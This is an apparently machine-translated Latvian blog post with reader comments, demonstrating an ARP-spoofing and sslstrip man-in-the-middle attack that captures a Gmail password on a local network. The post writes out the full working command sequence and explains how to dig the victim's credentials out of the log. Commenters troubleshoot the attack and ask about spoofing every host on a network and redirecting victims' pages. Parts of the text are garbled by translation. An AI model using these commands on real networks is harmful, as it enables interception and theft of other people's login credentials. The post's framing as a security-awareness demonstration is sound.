Sveiki Emuāru autori.
Šodien man ir neliels paraugs par to, cik bīstami var būt savienojums ar jebkuru tīklu bez drošības no tiem, kas patīk tik daudziem no mums.
Šodien es izmantoju ArpSpoofing ar Sslstrip, lai iegūtu Gmail paroli. Lai padarītu vidi kontrolētāku, esmu izveidojis kontu ar nosaukumu "testarp@gmail.com".
Un, tā kā man ļoti nepatīk preambulas, ķeramies pie lietas.
VIDE
Šajā pārbaudē mums ir šāds:
1. Uzbrucējs: Debian Wheezy ir mans galddators vai galddators. No krātuvēm jūs varat instalēt sslstrip y sniff lai dabūtu krāpšanās
2. Upuris: Upuris ir Android planšetdators, kurš vēlas redzēt savu pastu tikai caur pārlūku.
3. Medijs: Vidus ir mans Cisco DPC2425 maršrutētājs
ADRESES.
Uzbrucēja adrese: 172.26.0.2
Maršrutētāja adrese: 172.26.0.1
Upura adrese: 172.26.0.8
Uzbrukums:
Pirmā lieta, ko mēs izdarīsim šī uzbrukuma gadījumā, ir aktivizēt priekšu, lai mūsu dators varētu pārsūtīt informāciju upurim, nemanot. (Pretējā gadījumā tas būtu pakalpojumu atteikuma uzbrukums)
Tam mēs izmantosim:
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
sslstrip -a -w desdelinux -l 8080
Tagad, ja mēs darām asti -f desdelinux mēs redzam informāciju tiešraidē un tiešā veidā
Tātad, kā tad mēs iegūstam to, ko vēlamies?
Vispirms ievadīsim savu pastu planšetdatorā. Piesakoties, mēs redzam, ka mūsu konsolē parādās tūkstošiem un tūkstošiem lietu.
Tagad, kad tas ir pabeigts, atveram failu "desdelinux” ar nano
nano desdelinux
ar Control + W mēs meklējam kaut ko ar nosaukumu SECURE POST.
Un mēs redzēsim kaut ko līdzīgu šim.
Starp šo milzīgo līniju, kuru nevar redzēt, ir upura e-pasts un parole.
Tāpēc mēs skrienam pa labi, līdz beidzot redzam gaismu tuneļa galā.
Citā reizē mēs redzēsim, kā mēs varam nedaudz pasargāt sevi no šiem uzbrukumiem.
Sveicieni
Es izmantoju šo iespēju, sakot, ka tad, kad ziņa tika publicēta, komandas nebija pareizas.
Komandā iptables beigās trūkst 8080, kas atrodas citā rindā. Un tad arpspoof komandas bija vienā līnijā. Katra komanda atrodas uz citas līnijas.
Cerams, ka redaktors to redz un var izlabot.
Sveicieni.
Es veicu jūsu pieminētos labojumus, vai tas ir labi?
Ja vēlaties ievietot kodu vēlamajā ierakstā, izmantojiet HTML skatu un pirms tā nosūtīšanas uz gaida pārbaudiet, vai raksts ir pareizs. Paldies.
Drebuļi ir zināt, ka tie no mums, kuriem nav zināšanu, ir tik neaizsargāti. Ļoti laba informācija, pat ja es maz saprotu priekšmetu, es saprotu, cik svarīga. Paldies!
Sveicieni
Bet tas darbojas tikai tad, ja uzbrucējs un upuris atrodas vienā tīklā. Jebkurā gadījumā man šķiet, ka, ja (atrodoties vienā tīklā) jūs izveidojat savienojumu, izmantojot HTTPS, tas nenotiek, jo dati tiek šifrēti PIRMS aiziešanas no datora. Ja izveidojat savienojumu, izmantojot HTTP (bez S), es domāju, ka pat aplūkojot tīkla kabeli, jūs redzat atslēgas.
Tā nav patiesība. Es uzlaužu Gmail paroli un, ja pamanāt, ka Gmail izmanto https. Tātad? Lieta ir tāda, ka, lai arī https ir drošs, tas ir atkarīgs no http. Tāpēc tas nav tik droši.
Neatzīstieties tik daudz par https, ka S nav paredzēts Supermenam, bet gan "drošam"
tas darbojas ar vai bez https, esmu to izmēģinājis ar specializētāku linux distro un darbojas bez problēmām
To var precīzi izmantot, lai iemācītu tiem, kas nozog jūsu Wi-Fi. 😀
Tas ir vairāk vai mazāk līdzīgs tam, ko viņi teica sen Chema Alonso emuārā:
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba.html
http://www.elladodelmal.com/2013/04/hackeando-al-vecino-hax0r-que-me-roba_5.html
Ostia, lieliski, ko tā dara! / Un tad viņi man paranoiķiem saka katru reizi, kad izmantoju VPN, kad viņi dodas pārbaudīt bankas kontu ...). Starp citu, komentāros jāskatās, cik cilvēki ir ciniski ... ja beigās zog ...
Tagad mums jāveic apmācība par to, kā izveidot un piedāvāt savu VPN pakalpojumu.
Stāsts, kuru jūs saistāt, ir ļoti interesants, tas pat šķiet romāniskas grāmatas cienīgs, un tas man liek atcerēties, kad izmantoju kaimiņu internetu un, kaut arī saku, ka zinu šo tēmu, es domāju, ka nekad nevarēju saskatīt patieso briesmu dimensijas, kādas man varētu būt pēdējais, par laimi man, viņi mainīja tikai paroli uz WPA2, un tieši šeit sākās mans stāsts ar ISP
Tāpēc virsrakstā teikts, ka Sslstrip darbojas.
Tas darbojas, ja vien uzbrucējs atrodas pa vidu
Kādu vilni jūs strādājat pie prizmas? -.-
nē.
Ko jūs gaidāt, lai nosūtītu pieprasījumu XD
vēlējumiem
labs amats
Interesanti, es vēlāk veikšu izglītojošu testu ... Varbūt es pat varētu noņemt WiFi paroli un mazliet izklaidēties 😛
Jebkurā gadījumā, vai jūs varat darīt kaut ko līdzīgu, lai nosūtītu dažādas lapas uz tām, kuras pieprasīja mērķis? Piemēram, viņi vēlas atvērt Facebook, un es tos novirzīju uz Google? 😛
Jā. Bet tas viss ir ļoti atšķirīgs rullis.
Varbūt es to ievietošu vēlāk.
ļoti labs ieraksts, šīs tēmas ir ļoti izglītojošas, tagad mums jāspēj novērst šo uzbrukumu, jo daži (piemēram, es) izveido savienojumu ar publiskiem tīkliem (piemēram, universitāte), būtu lietderīgi no tā izvairīties.
Sveicieni!
Man tas nedarbojās 🙁
Kaut kas man šeit neizdodas, izņemot faktu, ka https savienojumi tiek šifrēti, izmantojot servera sertifikātu (kad sertifikāts ir jūsu mašīnā, jūsu pārlūkprogramma ir atbildīga par šifrēšanu) ar iptables, jūs novirzāt 80. portu (http) , nevis 443, kas ir https
Es arī tā domāju. Lieta ir tāda, ka, lai arī https ir "drošs", tas diemžēl ir atkarīgs no http. Tātad sslstrip to izmanto, tas pārlūkprogrammai liek domāt, ka tas izmanto https akreditācijas datus, taču tas tā nav.
svētais sūds! bet pārlūkprogrammai vajadzētu redzēt tādu brīdinājumu kā "šis sertifikāts nāk no aizdomīgas vietnes vai tamlīdzīgi" ... man noteikti būs jāveic testi XD
Nē, pilnīgi nekas neiznāk.
Tas man beidzot izdevās
Esmu izveidojis savienojumu WEP tīklā ar paroli, un tas tik un tā man tieši parādīja paroli.
Vaicājums. Vai jūs varat darīt šo pašu procedūru, bet visiem datoriem, kas ir savienoti ar tīklu, tā vietā, lai būtu viens upuris?
Jā tu vari. Bet es neesmu veicis eksperimentus. Izmēģiniet pats un pastāstiet mums, kā tas notiek.
Vienīgais, ko es saņemu, ir tas, ka upura mašīna tiek izslēgta bezsaistē, bet sslstrip man neko nerāda: /
Uz brīdi jāatspējo ugunsmūris. Vai vismaz iespējojiet ienākošos savienojumus.
Mēs un Zonde varējām redzēt tikai facebook lapas lietotājvārdu un paroli, gmail žurnālā neatradu nevienu rezultātu, arī man vajadzēja tikai arpspoof rindu «arpspoof -i -t«. No otras puses, cietušā mašīna nevarēja atvērt dažas lapas. Turpināšu izmeklēt, tas ir ļoti interesanti. Palīdzība tiem, kas izmanto Manjaro, instalējamās paketes ir: dsniff (šeit ir arpspoff), savīti un python2-pyopenssl. Sslstrip var lejupielādēt šeit: http://www.thoughtcrime.org/software/sslstrip/
Lai to palaistu, $ python2 sslstrip.py
Sveicieni.
Tas neiznāca, bet arpspoof līnija ir: #arpspoof -i int -t ip-upuris ip-router
izskatās, es daru tieši to, ko tu saki:
echo "1"> / proc / sys / net / ipv4 / ip_forward iptables -t nat -A PREROUTING -p tcp –mērķa ports 80 -j REDIRECT - uz portu 8080
arpspoof -i eth0 -t 172.26.0.8 172.26.0.1
arpspoof -i eth0 -t 172.26.0.1 172.26.0.2
problēma ir tā, ka upurim, kurš ir vēl viens personālais dators, kas man ir šeit, manā istabā, man nav nekāda sakara ar to, ka man ir jārestartē maršrutētājs. Ko es varu darīt, lai man palīdzētu.
Vēl viena lieta, ko es strādāju ar virtuālo mašīnu, un, izpildot komandu iwconfig, neparādās ne wlan0, ne tad, kad izpildu ifconfig, tomēr, ja manā virtuālajā mašīnā ir internets, ar eth0 saskarni.